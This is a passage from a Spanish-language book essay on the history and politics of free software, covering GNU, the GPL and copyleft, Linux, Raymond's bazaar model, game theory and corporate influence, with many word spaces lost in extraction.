Básicamente, el software es un plande funcionamiento para un tipo especialde máquina, una máquina virtual oabstracta. Una vez escrito mediantealgún lenguaje de programación, elsoftware se hace funcionar enordenadores, que temporalmente seconvierten en esa máquina para la que elprograma sirve de plan. El softwarepermite poner en relación al ser humano

Page 130: Internet, hackers y software li   varios

y a la máquina y también a las máquinasentre sí. Sin ese conjunto deinstrucciones programadas, losordenadores serían objetos inertes,como cajas de zapatos, sin capacidadsiquiera para mostrar algo en lapantalla.

Los ordenadores sólo procesanlenguaje binario[20], pero para laspersonas este no es un modo válido decomunicarse (salvo a nivel sináptico :-).Si bien en los tiempos heroicos de losprimeros ordenadores no les quedabaotro remedio que hacerlo, losprogramadores hace mucho que noescriben su código en lenguaje binario

Page 131: Internet, hackers y software li   varios

(denominado técnicamente código-máquina), pues es terriblemente tedioso,improductivo y muy sujeto a errores.

Hace tiempo que los programadoresescriben las instrucciones que ha deejecutar el procesador de la máquinamediante lenguajes formales, llamadosde alto nivel, bastante cercanos alinglés, si bien con rígidas reglassintácticas que lo asemejan a loslenguajes lógico-formales. Esto facilitaenormemente la tarea de escribirprogramas pero, para que esasinstrucciones sean comprensibles parael procesador, deben ser convertidasantes a código-máquina. Esa conversión

Page 132: Internet, hackers y software li   varios

se realiza cómodamente con programasespeciales, llamados compiladores. A loque escribe el programador se ledenomina código-fuente.

Al resultado de la conversión(compilación) en lenguaje-máquina, sele denomina código-objeto, binarios oficheros ejecutables. En principio, alusuario común sólo le importa esteúltimo nivel, los binarios, peroconviene tener clara la distinción entrefuentes y binarios pues es clave paraentender el empeño de los partidariosdel software libre en disponer de lasfuentes.

Pero el software libre es mucho más

Page 133: Internet, hackers y software li   varios

que el derecho de los programadores yde los hackers[21] a disponer de lasfuentes del código: significa también lalibertad de copiar y redistribuir esosprogramas. Esos derechos, o suausencia, condicionan a cualquiera queuse un ordenador y han configurado laindustria del software y de lainformática tal y como la conocemos hoydía. También ha dado lugar a unmovimiento social el del software librecuya historia reconstruiremosbrevemente en las próximas líneas.

Los inicios

Page 134: Internet, hackers y software li   varios

En la informática de los años sesentay setenta y en la cultura hacker quesurgió en torno a ella, se disponíalibremente de las herramientasnecesarias y del código fuente de la granmayoría de los programas. Lacolaboración forma parte desde antiguode los hábitos de la comunidadcientífica y además, ante la diversidadde plataformas, era necesario disponerdel código cuando se adquiría elprograma para poder portarlo alhardware de cada cual. Era tan normalcomo compartir recetas de cocina y nisiquiera se hablaba de software libre ,pues todo el que quería programar se

Page 135: Internet, hackers y software li   varios

beneficiaba de ello y veía lógico que losdemás se pudiesen beneficiar a su vez.

Los hackers copiaban los programas,intercambiaban sus fuentes, podíanestudiarlas, evaluarlas, adaptarlas a susnecesidades y a su hardware,reutilizaban una parte del código parahacer nuevos programas… El desarrollode bienes públicos basados en esemodelo fue exponencial hasta el puntode que gran parte de la tecnología en laque se basa hoy Internet —desde elsistema operativo UNIX hasta losprotocolos de red— procede de esosaños.

Pero, a principios de los años

Page 136: Internet, hackers y software li   varios

ochenta, ese modelo entra en crisis, yrápidamente comienza a emerger unmodelo privatizador y mercantilista. Losordenadores, hasta entonces escasos,caros y poco potentes, se hacenasequibles, cada vez más baratos ypotentes y aparece un nuevo negocio, elde los productores de software. Losprogramas se empezaron a vender comoproductos comerciales independientesde las máquinas y sólo con el códigobinario, para ocultar las técnicas deprogramación a la competencia.

La nueva industria del softwarecomienza a apoyarse en la legislaciónsobre propiedad intelectual. El mundo

Page 137: Internet, hackers y software li   varios

UNIX se fragmenta en diversasversiones privatizadas yprogresivamente incompatibles entre sí,que los programadores no puedenmodificar. Lo que era práctica habitual,se convirtió en un delito: el hacker quecompartía el código y cooperaba conotras personas pasó a ser consideradoun pirata.

Al tiempo que los sistemas vanhaciéndose incompatibles entre sí, lacomunidad de investigadores se vadesmembrando poco a poco. Muchoshackers ficharon para empresas yfirmaron contratos en los que secomprometían a no compartir con nadie

Page 138: Internet, hackers y software li   varios

de fuera los secretos de fabricación (elcódigo fuente). Por su parte, loslaboratorios de investigacióncomenzaron a hacer lo mismo yobligaban a sus hackers a suscribir elmismo tipo de cláusulas. Para cerrar elcírculo, los compiladores, losdepuradores, los editores y demásherramientas imprescindibles paraprogramar eran propietarios y sevendían a precios respetables: se tratabade que la programación de verdad sóloestuviese en manos de la nacienteindustria de software.

Hubo hackers que no aceptaron estanueva situación y continuaron con sus

Page 139: Internet, hackers y software li   varios

prácticas pero parecía solo una cuestiónde tiempo que la industria del softwarepropietario arrinconara y dejaradefinitivamente fuera de la ley la culturacooperativa y confiada de las primerascomunidades de hackers.[22]Estecontexto sirve de base y explica el augeposterior del imperio Microsoft ysimilares: estaba naciendo el negociodel software propietario y la prósperaindustria de los ordenadores personales.

El proyecto GNU

Page 140: Internet, hackers y software li   varios

Son los primeros años ochenta yseguiré la pista de algunos de esosprogramadores que habían conocido lavieja cultura hacker de los años setentay que no se plegaron a los designiosprivatizadores de la industria delsoftware.[23] De hecho, consideraron laprivatización un verdadero atentado alos mismos cimientos del proceso deconocimiento. Se cuestiona que lapropiedad intelectual sea un derechonatural, y se percibe como una prácticasocialmente indeseable.[24]

Con ese planteamiento nace elProyecto GNU (acrónimo recursivo quesignifica GNU’ s Not UNIX, o sea, GNU

Page 141: Internet, hackers y software li   varios

No es UNIX) de la mano de Richard M.Stallman, un hacker del emblemáticoLaboratorio de Inteligencia Artificialdel Massachusetts Institute Technology(MIT). Era el año 1984, Stallmanabandona el MIT para que no interfieraen sus planes y, junto a otros hackersinteresados en el proyecto GNU, crea laFree Software Foundation (FSF) en1985: comienza una labor metódica ydiscreta, guiada por una asombrosavisión estratégica.[ 25]

El proyecto GNU se propuso a lasazón una tarea titánica: construir unsistema operativo libre completo. No essencillo expresar en pocas palabras la

Page 142: Internet, hackers y software li   varios

enorme dificultad que comporta unproyecto así, sólo al alcance de unascuantas empresas con miles deprogramadores a sueldo. No digamos yasi no se dispone de herramientas parahacerlo. Stallman tuvo que empezar casidesde cero, sin modelo bazar, pues noexistía la universalizada red Internet taly como hoy la conocemos; tampocoexistía una comunidad dedesarrolladores lo suficientementegrande y ni siquiera se disponía de uncompilador libre para empezar eltrabajo.

Una analogía es construir una casasin disponer apenas de herramientas, por

Page 143: Internet, hackers y software li   varios

lo que primero hay que fabricarlas:desde picos y palas hasta ladrillos ycemento. Eso sí, contaba con algúnmaterial reciclable de otras casasgrandes fragmentos de código UNIX yuna cultura de reutilizar código.Stallman y la FSF merecen por tanto unreconocimiento especial en esta historia,pues sin compilador, depurador y editorlibres no habría sido posible lo que vinodespués, incluyendo el propio Linux.

Con todo lo importante que eran esasherramientas, no fue ni mucho menos laprincipal aportación de la FSF. Y es quelos hackers que impulsaron el ProyectoGNU en aquellos años no se

Page 144: Internet, hackers y software li   varios

conformaron con su trabajo dedesarrolladores, ya de por síformidable. Se dieron cuenta de quenecesitaban algo más que crearherramientas de software que dieranlibertad a los programadores. Para queel trabajo no fuera estéril y fácilmentereapropiable por intereses privados,precisaban además defender esa libertaden el terreno político y jurídico. ElManifiesto GNU (1985), escrito por elpropio Richard Stallman, es ladeclaración de principios e intencionesdel proyecto; inspirada en susprincipios, se lanza en 1989 la primeraversión de lo que fue posiblemente el

Page 145: Internet, hackers y software li   varios

mejor logro de la FSF ysignificativamente no en el terrenoinformático, sino en el ámbito jurídico:la GPL (General Public License) oLicencia Pública General.[26]

La GPL: copyleft para tod@s

Utilizando un brillante juego depalabras, tan del gusto de los hackers,Stallman inventa el concepto decopyleft, con el propósito político degarantizar la libre circulación de lossaberes contenidos en el software y la

Page 146: Internet, hackers y software li   varios

posibilidad de que todos contribuyan asu mejora. El copyleft se sirve de lasleyes internacionales del copyright paradarles la vuelta (all rights reversed:todos los derechos del revés ) puesprotege el uso en lugar de la propiedad.

El autor se reserva los derechospara que su obra pueda ser utilizada porcualquiera con la única condición deque nadie recorte o elimine esosderechos de libre uso: en el momento enque alguien suprima o añada nuevascondiciones que limiten en algo sudisponibilidad (por ejemplo,distribuyendo código binariomodificado sin posibilidad de acceder a

Page 147: Internet, hackers y software li   varios

las fuentes modificadas) estaríavulnerando la licencia y perdería elderecho a servirse de ese software.Obligando a transferir esos derechos acualquiera que copie ese software, lomodifique o no, se beneficia quien estáde acuerdo con mantener su futurotrabajo con copyleft, mientras que quienquiera desarrollar software propietariono podrá utilizar código libre y deberáempezar desde cero.

La GPL o Licencia Pública Generales la plasmación jurídica del conceptocopyleft. Con el tiempo, la GPL se haconvertido en el cimiento del softwarelibre, su baluarte legal, y para muchos

Page 148: Internet, hackers y software li   varios

constituye un extraordinario ejercicio deingeniería jurídica: con la GPL seasegura que trabajos fruto de lacooperación y de la inteligenciacolectiva no dejen nunca de ser bienespúblicos libremente disponibles y quecualquier desarrollo derivado de ellosse convierta como por ensalmo enpúblico y libre. La GPL se comporta deun modo vírico y, como un rey midas delsoftware, convierte en libre todo lo quetoca, es decir, todo lo que se deriva deella.

Junto al modelo copyleft, hay otrosdesarrollos de software libre que no soncopyleft y considerados menos estrictos

Page 149: Internet, hackers y software li   varios

en cuanto a la licencia, cuya mayordiferencia con el copyleft es que noinsisten en que el código derivado tengaque seguir siendo libre. Es el caso delas licencias tipo BSD[27] y las de tipoX11/XFree86: no ponen el énfasis enasegurarse que el software libre sigasiéndolo, pues los partidarios deBerkeley consideran que de algún modoeso ya es limitar derechos.Posiblemente, es una postura que seacerca al anticopyright y a la noción dedominio público (un bien quejurídicamente no es de nadie), pero esmenos comprometida —al menos encuanto a la licencia en garantizar que el

Page 150: Internet, hackers y software li   varios

software libre no deje de serlo. En lapráctica y dejando los matices de tipojurídico, tanto las licencias tipoBSD/XFree86 como la GPL son elbaluarte del software libre y ambasrepresentan un referente ético y prácticoalternativo al software propietario.

Linux

Disponiendo de la GPL y depoderosas herramientas informáticaslibres llegamos a los años noventa, conun sistema operativo GNU ya casi

Page 151: Internet, hackers y software li   varios

completo. Faltaba el kernel o núcleo desistema, una pieza funda mental y muycompleja que se iba retrasando más delo debido por la enorme dificultad de laempresa y por la escasez de voluntariosque tra bajasen en ello (hay que recordarque la mayor parte de los hackers hanescrito su código en ratos libres).

Por aquel entonces, por su cuenta yriesgo y sin ninguna relación con la FSF,un estudiante finlandés llamado LinusTorvalds decide ponerse a escribir unkernel que pueda funcionar y sacar todoel partido de la arquitectura de 32 bitsde los nuevos procesadores i386.Cuenta con las herramientas GNU para

Page 152: Internet, hackers y software li   varios

hacerlo, y con un desarrollo UNIX paralos PC de 16 bits de entonces (minix).Por primera vez hay máquinasdisponibles a nivel personal y a precioasequible capaces de trabajar con unsistema multitarea. Linus decideentonces hacer un llamamiento a travésde las news para quien quiera ayudarleen el desarrollo. A los pocos meses(1992), son unos cientos de entusiastashackers de todo el mundo, coordinados através del correo electrónico y de lasnews y sin ningún interés económico, losque consiguen el milagro.

A un ritmo frenético y en medio deun caos aparente, van dejando versiones

Page 153: Internet, hackers y software li   varios

en los repositorios FTP de Internet paraque la gente las pruebe, las estudie o lasmejore. Linus pone el desarrollo delkernel bajo la GPL y el proyecto GNUse pone a trabajar para integrar el nuevokernel con el resto del sistema. Desdeentonces la historia es bien conocida: aprincipios del año 2000 sonprobablemente más de mil hackers losque dan soporte al kernel y se calculanveinte millones de usuarios del conjuntoGNU/Linux. En suma, disponemos librey gratuitamente de un sistema operativocompleto, potentísimo y fiable como elque más, que doblega a las grandesfirmas y desafía a muy corto plazo al

Page 154: Internet, hackers y software li   varios

ubicuo imperio de los WindowsTM conmiles de programas en constanteevolución (la última distribuciónGNU/Linux del Proyecto Debian[28]

recopila más de 4500 paquetes decódigo libre).

Si bien es el más conocido, elnúcleo Linux no es el único ejemplo delincreíble éxito del software libre: porejemplo, el 62% de los servidores webde Internet (equivalente a diez millonesde sitios web, según el último estudio deNetcraft,[29] correspondiente a junio de2000) se basa en un software librellamado Apache, o en alguna versiónmodificada del mismo. Apache lo

Page 155: Internet, hackers y software li   varios

desarrollaron en un tiempo record ungrupo de webmasters y ha minimizado eluso de los servidores propietarios deMicrosoft y Netscape (en el mismoestudio de Netcraft aparece en segundolugar, muy lejos de Apache, el IIS deMicrosoft con un 20,36% de losservidores web y tercero Netscape-Enterprise con solo un 6,74%).

Muchas otras utilidades yaplicaciones basadas en software libreoperan en servidores de todo el mundoy, de modo silencioso y transparentepara el usuario de a pie, garantizan elfuncionamiento cotidiano de Internet yde otras muchas redes y sistemas

Page 156: Internet, hackers y software li   varios

informáticos, libres de los virus yagujeros de seguridad queperiódicamente atormentan a losinseguros sistemas basados enWindows. Disponer del código fuentepermite localizar errores y corregirlos, eincluso detectar la existencia de códigomalicioso (virus, puertas traseras,troyanos) que las empresas y grupos depoder pueden eventualmente introduciren los programas y sistemas operativoscerrados como forma de control y deasalto a la privacidad.[30]

El responsable de esta revueltaantipropietaria (Linux es subversivo: asíempieza La catedral y el bazar) no es

Page 157: Internet, hackers y software li   varios

Linus Torvalds ni Richard Stallman ni laFSF, ni universidad, gobierno oinstitución alguna, ni menos aún lasempresas que ahora cotizan en elNasdaq con Linux como bandera. Elresponsable de todo esto es la propiacomunidad de usuarios del sistema. Enel caso de Linus Torvalds, su mayormérito y por lo que debe ser reconocidosin discusión no es por el kernel Linux,por extraordinario que sea este, sino pore l modelo bazar, la genial intuición deingeniero que tuvo para ponerlo a topede vueltas en el momento justo (sin laexplosión de Internet y de losordenadores personales no habría sido

Page 158: Internet, hackers y software li   varios

posible).Linus ha llevado probablemente

hasta sus límites el modelo bazar y lo haexprimido al máximo, aunque justo esdecir que para nada lo inventó, puesdesde siempre formaba parte de algunosentornos UNIX y de la práctica dedeterminadas comunidades científicas yacadémicas (como Bell Labs, el MIT AILab o la Universidad de California enBerkeley), que lo aplicaron y obtuvieronéxitos legendarios: pero nadie antes queLinus lo había lanzado a escalaplanetaria, fuera del ámbito científico ycon ese formidable grado de intensidady productividad. Se puede afirmar sin

Page 159: Internet, hackers y software li   varios

temor a exagerar que el sistemaoperativo libre GNU/Linux es la obramás importante que hasta ahora haproducido Internet.

El modelo bazar

Actualmente y gracias al proyecto entorno al kernel Linux, el principalmodelo de desarrollo del software librees el modelo bazar. Fue descrito porEric S. Raymond en su ya clásico Lacatedral y el bazar[31] (1997) y sin dudaconstituye una aportación singular en

Page 160: Internet, hackers y software li   varios

este capitalismo de fin de siglo.Raymond contrapone el modelo bazar aun modelo de producción de software alque denominó modelo catedral,[32]

basado en la necesidad de un arquitectoal mando de un staff rígidamenteestructurado y jerarquizado y el estrictocontrol de errores previo a lapublicación. A juicio de Raymond, elmodelo catedral no sólo corresponde ala industria del software propietario,sino a algunos de los grandesdesarrollos libres que ha avalado laFSF.

Según Raymond, el modelo bazar deprogramación se resume en tres

Page 161: Internet, hackers y software li   varios

máximas: 1) liberar rápido y a menudo;2) distribuir responsabilidades y tareastodo lo posible, y 3) ser abierto hasta lapromiscuidad para estimular al máximola cooperación. Incluso cumpliendo esasmáximas, no si empre es posible elmodelo bazar: sólo puede darse en unentorno de libertad, cooperación,comunidad y disponiendo del códigoabierto. El bazar encuentra dificultadpara producir cooperación cuando seempiezan proyectos desde cero o cuandose ensaya en grupos reducidosdemasiado heterogéneos o con muchodesnivel de conocimiento, por lo que amenudo encontramos fórmulas mixtas

Page 162: Internet, hackers y software li   varios

entre el bazar y la catedral.A juicio de Raymond, el modelo

bazar es mucho más eficaz y produce unsoftware de mayor calidad con menorgasto de recursos, lo que por sí solo yajustificaría la aplicación masiva delmodelo en la industria del software. Sindejar de reconocer esto, la gente quesigue los postulados de la FSF, insisteen que la calidad del código libre hasido un elemento extra y no es la razónde ser del software libre, ya que másimportante que la potencia y lafiabilidad técnica es la libertad, el biensocial y la comunidad autogestionada deusuarios y desarrolladores a que da

Page 163: Internet, hackers y software li   varios

lugar, sin precedentes en ningún otroámbito, que por primera vez lleva lainiciativa y el total control tecnológicosobre lo que usa.

En todo caso, con bazar o sin él ymás allá de su demostrado éxito a nivelorganizativo y técnico, el software libredesafía la lógica interesada ymercantilista que parecíadefinitivamente asentada en lo social.Alguien podría objetar que los procesosde cooperación no son una novedad enel capitalismo avanzado y que de hechoson parte imprescindible del modelo deorganización posfordista.[33 ] Pero esteúltimo precisa cooperación sujetada,

Page 164: Internet, hackers y software li   varios

orientada únicamente a la extracción debeneficio, en ningún casoautodeterminada. La novedad queintroduce el software libre es que poneen funcionamiento un modelo decooperación sin mando. No hayintereses empresariales directos, esgeneral intellect puro, ingobernable ylibre del mando.[34] Es más, la ausenciade mando, de control corporativo ojerárquico, parece condición sine quanon: allí donde reaparece el mando seaen forma de interés propietario, sea ensu variante autoritaria, el modelo semarchita, se agosta y acaba pordesaparecer. Como el pájaro bobo (el

Page 165: Internet, hackers y software li   varios

pingüino), sólo puede vivir en libertad.Nadie da órdenes, nadie acepta

órdenes. Y sin embargo, la gente secoordina, se organiza, hay gurús,líderes, gente que dirige proyectos: peroes autoridad conferida, no es mando.Funciona una especie de economía delregalo, en la cual se es más apreciadocuanto más se aporta a la comunidad.Nadie puede exigir, no hay garantía, nohay dinero como estímulo para eltrabajo,[35] aunque haya gente que cobrepor su trabajo o gane dinero medianteLinux, pues ninguna objeción hay en lacomunidad para que los hackers puedanser remunerados por su trabajo. Todo

Page 166: Internet, hackers y software li   varios

este bazar caótico de listas y gruposdispersos de voluntarios por Internetproduce el mejor software,complejísimo software cuyo desarrollono está al alcance ni de la empresa máspoderosa del planeta. Porque lacomunidad del software libre es ya laempresa de software más poderosa delplaneta.

La teoria de juegos

¿Cómo es esto posible? ¿Por quéganan las estrategias altruistas a las

Page 167: Internet, hackers y software li   varios

egoístas en el software libre? ¿Por quéla gente no trata simplemente de extraerel máximo beneficio económico comoenseña el capitalismo? ¿Por qué lospragmáticos no se limitan a tratar deaprovecharse y en la práctica cooperancomo el que más (aunqueideológicamente no lo reconozcan)?

Desde la propia comunidad delsoftware libre ha habido intentos deexplicar estos fenómenos a través de lateoría de los juegos.[36] Y ciertamente,el clásico dilema entre bien colectivoversus actitud egoísta es superado porun axioma que recuerda vagamente aldilema del prisionero de la teoría de

Page 168: Internet, hackers y software li   varios

juegos: la cooperación es preferibletambién desde una perspectiva egoísta.Y, al igual que sucede en el dilema delprisionero, esto no siempre es evidentede primeras. Inventado hace medio siglopor especialistas de la teoría de juegos,el dilema del prisionero se utilizó paraestudiar el concepto de elecciónracional y para ilustrar el conflictoexistente entre beneficio individual ybien colectivo.[37]

En la teoría de juegos tradicional, laestrategia ganadora es la llamada Tit forTat (donde las dan las toman) : sólocoopero si el otro coopera . Es tambiénla más simple, se comienza cooperando

Page 169: Internet, hackers y software li   varios

en la primera jugada y despuéssimplemente se copia el movimientoprevio del otro jugador. Los teóricos dejuegos consideran que Tit for Tat reúnedos rasgos que identifican a lasestrategias ganadoras y que juntas lahacen ganar en todas las pruebasrealizadas por ordenador contraestrategias mucho más sofisticadas yma s sucias (egoísmo no cooperativo):es amable y es clemente. Una estrategiaamable es aquella que nunca es laprimera en ser egoísta.

Una estrategia clemente es la quepuede vengarse pero tiene malamemoria, es decir, tiende a pasar por

Page 170: Internet, hackers y software li   varios

alto antiguas ofensas (se vengainmediatamente de un traidor o egoísta,pero después olvida lo pasado). No seolvide que es amable en sentido técnico,no moral, pues no perdona en absoluto.Tit for Tat tampoco es envidiosa, que enla terminología de Robert Axelrodsignifica que no desean más recompensaque los demás y se siente feliz si el otrotiene el mismo premio que uno mismo(de hecho Tit for Tat, nunca gana unjuego, como máximo empata con suoponente): en el software libre significadesear que todos tengan las mismaslibertades de que dispone uno mismo.Que lo más eficaz sea ser amable y

Page 171: Internet, hackers y software li   varios

clemente parecía desafiar todo sentidocomún y constituyó toda una sorpresapara los matemáticos, psicólogos,economistas y biólogos que hanestudiado a fondo las diversasestrategias de la teoría de juegos.[38]

Esta conclusión, que abrió una nuevadirección de análisis, se ha confirmadouna vez tras otra en los estudios ytorneos organizados por el politólogoestadounidense Robert Axelrod: siempreacaban ganando las estrategias amablesy clementes y siempre salen derrotadaslas estrategias sucias. Por su parte,biólogos, genetistas y etólogos estáncada vez más convencidos de que la

Page 172: Internet, hackers y software li   varios

cooperación egoísta es la dominante enla naturaleza.

De acuerdo a la teoría de juegos, losindividuos del Tit for Tat, cooperandoentre sí en acogedores y pequeñosenclaves locales, pueden prosperarhasta pasar de pequeñas agregacioneslocales a grandes agregaciones locales.Estas agregaciones pueden crecer tantoque se extiendan a otras áreas hastaentonces dominadas, numéricamente, porindividuos egoístas que juegan al Voy alo mío. A su vez, la cooperación es unfenómeno que produce realimentaciónpositiva: nadie que disfrute de losbeneficios del software libre puede

Page 173: Internet, hackers y software li   varios

dejar de promover su uso. Por eso lacomunidad conserva cierto tonoproselitista, además de por unapercepción más o menos generalizada deque la potencia y el futuro del modelodepende muy directamente de que hayamucha gente participando activamente ensu desarrollo.[39]

Sin embargo, el modelo Tit for Tatno caracteriza totalmente al softwarelibre, al menos no de una maneracanónica. Por un lado, es libre inclusopara quienes no cooperan (esto le davalor ético, pero le aleja del Tit forTat). Por otro lado, aunque el copyleftpermite que cualquiera se beneficie, no

Page 174: Internet, hackers y software li   varios

permite que nadie se lo apropie o que seuse para crear software propietario(esto le da valor pragmático y leaproxima al Tit for Tat). La estrategiadel software libre es amable y clementea la vez, pero a diferencia del Tit for Tates capaz de asumir en su senoestrategias egoístas sin necesidad deexpulsarlas o vengarse de ellas (salvoquizá en casos en que se percibe unverdadero peligro, como que algunaempresa poderosa adoptase posicionesdescaradamente egoístas nocooperativas, por ejemplo vulnerando laGPL).

En el software libre, convive un

Page 175: Internet, hackers y software li   varios

planteamiento basado exclusivamente enla eficacia, en la superioridad técnica yproductiva que genera el modelo bazar,con otro que sitúa en primer plano lacooperación, la ética y la libertad. Lapostura pragmática, que hay quien hacalificado críticamente comorealpolitik,[40] rechaza cualquierformulación ética del modelo y sóloacepta como ideología las reglas dellaissez-faire propias del liberalismomás ortodoxo. Este planteamiento apoyay potencia decididamente el softwarelibre, porque ha verificado que suresultado es más eficaz, no porquevalore la cooperación en términos de

Page 176: Internet, hackers y software li   varios

producción de bienes públicos o debeneficio social ni porque considereinmoral el modelopropietario.[41]Incluso puede que solo leinterese la cooperación social comopoderosa máquina al servicio delcapitalismo. Esta parte del modeloprobablemente es la que se ajusta mejora la teoría de juegos de acuerdo alconcepto de la cooperación egoísta: lasempresas cooperan porque a la largoobtendrán más beneficios y losindividuos cooperan porque apoyando elmodelo dispondrán de mejoresaplicaciones.

Junto a este planteamiento coexiste

Page 177: Internet, hackers y software li   varios

un acercamiento ético o altruista.Conviene no confundirlo con unaltruismo de base moral, religiosa ometafísica, sino de una ética materialistaque considera la libertad y lacooperación social el mejor modo dedefender algo que es bueno para todos yque encuentra otros estímulos diferentesal beneficio económico.[42] Dicho deotro modo, no se trata de una historia dealtruistas y egoístas, de buenos ymalos, que como tantos otros dilemasmorales se han mostrado inoperantes porfalsos: pero hay una cuestión política defondo muy importante que los diferenciaclaramente y es la de si el software y, en

Page 178: Internet, hackers y software li   varios

general, el saber humano puede o nopuede ser privatizado. Mientras para elsector pragmático esto no es relevante,para Stallman y quienes abogan por lavisión ética esto es una cuestión centrale innegociable: el software, a diferenciade los bienes materiales, no puede serposeído, pues puede ser disfrutado porun número indeterminado de personassin que por ello haya que privar a nadiede tenerlo a su vez.[43] Ese es el núcleodel dilema, de la diferencia, y el quecomporta acercamientos tan dispares alsoftware libre.

La teoría de juegos funciona a nivelestadístico y se basa en estrategias

Page 179: Internet, hackers y software li   varios

inconscientes de base algorítmica (laspueden ejecutar máquinas, genes o sereshumanos): no aplica pues criteriosmorales o finalistas ni trata de darcuenta de los casos particulares, ni delas motivaciones de cada cual paracooperar o para ser egoísta, sino quenos ofrece algo más sutil y valioso: lacomprensión de un proceso y elcuestionamiento de un mito capitalista yneoliberal, el del juego sucio y el todoscontra todos, el de que es mejor quecada uno vaya a lo suyo y solo seatienda a los intereses privados. Lasconclusiones de la teoría de juegos pesea carecer de finalidad moral nos ofrece

Page 180: Internet, hackers y software li   varios

un resultado optimista y alentador parauna ética materialista (no moralista nireligiosa). La teoría de juegos y elsoftware libre podrían ser la punta delanza de un nuevo mito, el mito decompartir, el de la cooperación y laayuda mutua. Podría anunciar lasaludable idea de que incluso conindividuos egoístas al mando, y enpalabras del biólogo Dawkins, losbuenos chicos acaban primero.

No obstante, hay también razonespara pensar que si el enfoquepragmático, apolítico, también llamadocooperación egoísta, se acabaimponiendo, dañará a la comunidad del

Page 181: Internet, hackers y software li   varios

software libre, que podría acabar siendorecuperada por el capitalismoposfordista, del mismo modo querecupera el general intellect (lacooperación y el saber social general) ylo pone al servicio de la extracción debeneficio privado. Otros, sin embargo,apuestan por la coexistencia de ambastendencias, y piensan que mientras lapostura egoísta se avenga a cooperardentro de las reglas del software libreno habrá nada que temer. Ese debate loabordaré en el siguiente epígrafe.

Desafíos e interrogantes

Page 182: Internet, hackers y software li   varios

El interés en el software crecemás rápido que la conciencia acerca dela filosofía sobre la cual está basado, yesto crea problemas. Nuestracapacidad de enfrentar los desafíos yamenazas al software libre depende dela voluntad de mantenerse firmes dellado de la libertad. Para asegurarnosde que nuestra comunidad tiene estavoluntad, necesitamos esparcir la ideaentre los nuevos usuarios a medida queellos llegan a nuestra comunidad. Peroestamos fracasando en esto: losesfuerzos realizados para atraernuevos usuarios a nuestra comunidadsobrepasan de lejos a los esfuerzos

Page 183: Internet, hackers y software li   varios

dedicados a la enseñanza cívica acercade nuestra comunidad. Necesitamoshacer ambas cosas, y es necesario quemantengamos ambos esfuerzosequilibrados. Richard Stallman.

Entre 1997 y 1998 se producen tresacontecimientos que, a juicio de muchos,inauguran un nuevo periodo en el ámbitodel software libre: la publicación de Lacatedral y el bazar; la liberación delcódigo fuente de Netscape y la foto deLinus Torvalds en la portada de larevista Forbes. Convencionalmente, seconsidera que esos tres hitosdespertaron el interés y dieron pie a laentrada masiva de las grandes empresas

Page 184: Internet, hackers y software li   varios

en el mundo del software libre. Estanueva etapa está llena de sombríosinterrogantes, por mucho que algunos ladescriban triunfalmente, yprobablemente van a generar nuevosfocos de antagonismo. Algunas grandesempresas han comenzado a contratarhackers (lo cual no es nuevo) para llevara cabo desarrollos de software libre(esto sí lo es). Trabajos que antes sehacían sin interés económico directoahora empiezan a estar financiados porempresas. Proyectos cuya motivaciónera la necesidad o el deseo de loshackers y de la comunidad de usuariosde software libre, ajena al mercado,

Page 185: Internet, hackers y software li   varios

ahora pueden empezar a estarcondicionados por las necesidades, losritmos y las prioridades de las empresasque financian esos proyectos.[44]

Modestos negocios que basaban susingresos en servicios relacionados conel software libre se han convertido de lanoche a la mañana en grandes empresasque han salido a bolsa con capital-riesgo. Algunas empresas que basan sunegocio en el software libre se estándedicando a comprar empresas máspequeñas y a su vez son compradas porotras mayores, produciéndose lacreación de grandes emporios. Ese trajínde compraventa incluye sitios

Page 186: Internet, hackers y software li   varios

estratégicos para la comunidad comomedios de comunicación o repositoriosde software: Andover compra Slashdoty Freshmeat; VA Linux compraAndover; RedHat compra Cygnus, etc.¿Adónde conduce esa concentraciónempresarial? ¿Qué pinta la gente de apie en todo este tinglado?

Hasta ahora, en la comunidad delsoftware libre todo esto no se apreciacomo una amenaza, ni siquiera como unproblema, antes al contrario: algunagente se ha esforzado mucho paraconvencer a las empresas de laviabilidad capitalista del modelo, yahora empiezan a recogerse los frutos.

Page 187: Internet, hackers y software li   varios

¿Cómo vamos a oponernos ahora a quelas empresas ganen dinero con elmodelo, siempre y cuando mantengan lasreglas del juego, es decir, produzcan ofinancien software libre?

Ni tenemos perspectiva ni ha pasadotiempo suficiente (apenas dos años) paravalorar lo que va a suponer la irrupciónmasiva de capital fuerte y detransnacionales en el software libre. Miapreciación personal es que, adiferencia de otras cuestiones en que semantiene una actitud crítica y muy alerta(como la legislación sobre patentes), eneste crucial asunto hay excesiva fe en lasbondades del mercado y del libre

Page 188: Internet, hackers y software li   varios

comercio. Es cierto que hasta ahora seha conseguido doblegar a verdaderosgigantes, pero ahora la situación esdistinta porque con el modelo decooperación egoísta —y qué mayorparadigma de la cooperación egoístaque el de la empresa capitalista— esasempresas juegan a estar dentro. Sepuede pasar fácilmente de lacooperación sin mando a la cooperaciónsujetada, la cooperación con mando.

Se presupone, en contra de todaevidencia histórica anterior, que lo quees bueno para las empresas es tambiénbueno para las personas. Y el axioma noes ese, sino uno más tautológico pero

Page 189: Internet, hackers y software li   varios

también más exacto: lo que es buenopara las empresas es bueno para lasempresas. Y nada más. Bien es ciertoque, a veces, aquello que generabeneficio empresarial es reutilizadopara procurar beneficios sociales, peroesto es colateral (como un epifenómeno)y es atrozmente ingenuo confiar a priorien que va a ser así. La confusión entre loque es bueno para las empresas (laacumulación de capital y la extracciónde beneficio económico por encima decualquier otra consideración) y lo que esbueno para la gente (la producción debienes públicos y de riqueza social parala vida en comunidad) puede ser

Page 190: Internet, hackers y software li   varios

desastrosa. Todo el interés delcapitalismo en el software libre esconvertirlo en una máquina más de hacerdinero, pero como con todo lo demás silo consigue probablemente será a costade vaciarlo de todo contenido liberador.

El sector que va más allá de lasuperioridad técnica y que realiza unaapuesta por la dimensión ética delsoftware libre, confía en la fortaleza delmovimiento y de momento no se percibealarma alguna en este sentido. Seconsidera que el modelo de produccióndel software libre no puede serprivatizado y recuperado por elmercado, que está blindado

Page 191: Internet, hackers y software li   varios

jurídicamente (la GPL), técnicamente (lasuperioridad en varios órdenes demagnitud de lo creado mediante elmodelo bazar frente a sistemaspropietarios) y políticamente (algunosde los más significativos promotores delsoftware libre provienen demovimientos contraculturales osimpatizan con causas pro derechosciviles).[45]

No obstante y compartiendo esaconfianza en la potencia de lacomunidad y su capacidad de respuesta,demostrada ampliamente hasta ahora, nohay razón para desechar una lectura máscrítica que nos haga cuando menos estar

